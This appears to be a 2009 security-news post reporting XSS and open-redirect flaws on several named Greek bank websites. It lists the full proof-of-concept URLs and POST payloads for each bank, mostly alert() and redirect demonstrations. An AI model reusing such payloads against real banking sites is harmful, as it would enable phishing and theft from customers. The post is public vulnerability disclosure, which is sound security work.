Advertisements

 Major Greek bank sites with SSL vulnerable to XSS and open redirects

Written by DP

Sunday, 10 May 2009

Security researcher "Hexspirit" has discovered multiple XSS and open redirect vulnerabilities affecting all major Greek bank websites.

Fraudsters can exploit these cross-site scripting flaws to conduct convincing phishing attacks against e-banking customers and site visitors. Most pages are served over SSL. Security cannot be guaranteed just by the presence of "https" at the start of a URL, or checking that the browser address bar contains the correct domain name. 

All the reported vulnerabilities are working at this time of writing and we hope to be fixed as soon as possible.

Greek Banks XSS Mirrors:


winbank.gr XSS Mirror (SSL)

URL: https://www.winbank.gr/utils/iban1/iban_GR.asp
POST: PBAccount=&HiddenPirAccount=&HiddenPrintMode=0&OtherAccount=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS% 2F%29+%2F%3E&submit2=%C5%F0%E9%E2%E5%E2%E1%DF%F9%F3%E7



milleniumbank.gr XSS Mirror (no SSL)

URL: http://www.millenniumbank.gr/MillenniumVB/Templates_NB_Tools/NB_PopUp_IBANCalculator.aspx?LANGID=30&
MENU=CALC
POST: txtAccountNo=&_ctl0%3AtxtIBANCheck=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F% 3E&_ctl0%3AbtnCheckIBAN=%CE%88%CE%BB%CE%B5%CE%B3%CF%87%CE%BF%CF%82



probank.gr XSS Mirror (SSL)

URL: https://www.probank.gr/search/index.php?qu=%22%3Cmarquee%3E%3Cimg+src%3Dk.png+onerror%3Dalert(%2FXSS
%2F)+%2F%3E%3Ch1%3EXSSed%3C%2Fh1%3E


proton.gr XSS Mirror (SSL)
protonbank.gr XSS Mirror (SSL)

URL: https://www.proton.gr/search/index.php?sid=61f882a8fc8dd3e8e175a416b0fb0afa&qu=%22%3E%3Cimg%20src=k%
20onerror=alert(/XSS/)%20/%3E%3Ciframe%20src=%22http://www.xssed.com%22%3E

URL: https://www.protonbank.gr/search/index.php?sid=5aa6fd152554b75ef8d5da27c103eff9&qu=%22%3E%3Cimg+src%
3Dk+onerror%3Dalert(%2FXSS%2F)+%2F%3E%3Ciframe+src%3D%22http%3A%2F%2Fwww.xssed.com%22%3E


eurobank.gr XSS Mirror (SSL)

URL: https://www.eurobank.gr/europortal/content/europortal/gr/content/privateservices/ibancalc.asp
POST: branch=3243&cd=43&main=%22%3Cimg+src%3D%22%22+onerror%3D%22write%28%27%3Cbody%3E%3Cb%3EHexspirit+was +here.+XSS+flaw.%3C%2Fb%3E%27%29%3Bclose%28%29%3Balert%28body.innerHTML%29%22+%2F%3E&account=&ibansp ace=&source=


nbg.gr Open redirect Mirror (SSL)

URL: https://e-loans.nbg.gr/webaccess/nbg/hanbg/loading.asp?pn=http://www.xssed.com

 


alpha.gr XSS Mirror (SSL)

URL: https://www.alpha.gr/tools/account.asp?Error=1&Browser=nc&AccountNumber="><img+src=""
onError="document.location='http://xssed.com'">


bankofcyprus.gr Open redirect Mirror (no SSL)

URL: http://www.bankofcyprus.gr/adredir2.asp?url=http://www.xssed.com


ttbank.gr XSS Mirror

URL: http://www.ttbank.gr/default.asp?langID=1&pageID=122&siteID=1&SearchWord=%22%3E%3Cmarquee%3E%3Cimg+s
rc=%22%22+onerror=%22write(%27%3Cb%3EHOHO%20XSSed%3C/b%3E%27);close();%22+/%3E&x=10&y=7


dias.com.gr XSS Mirror (no SSL)

URL: http://www.dias.com.gr/dias/content/main.asp?menu=2&search=%22%3E%3Ciframe%20src=%22http://www.xssed
.com%22%3E


        
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.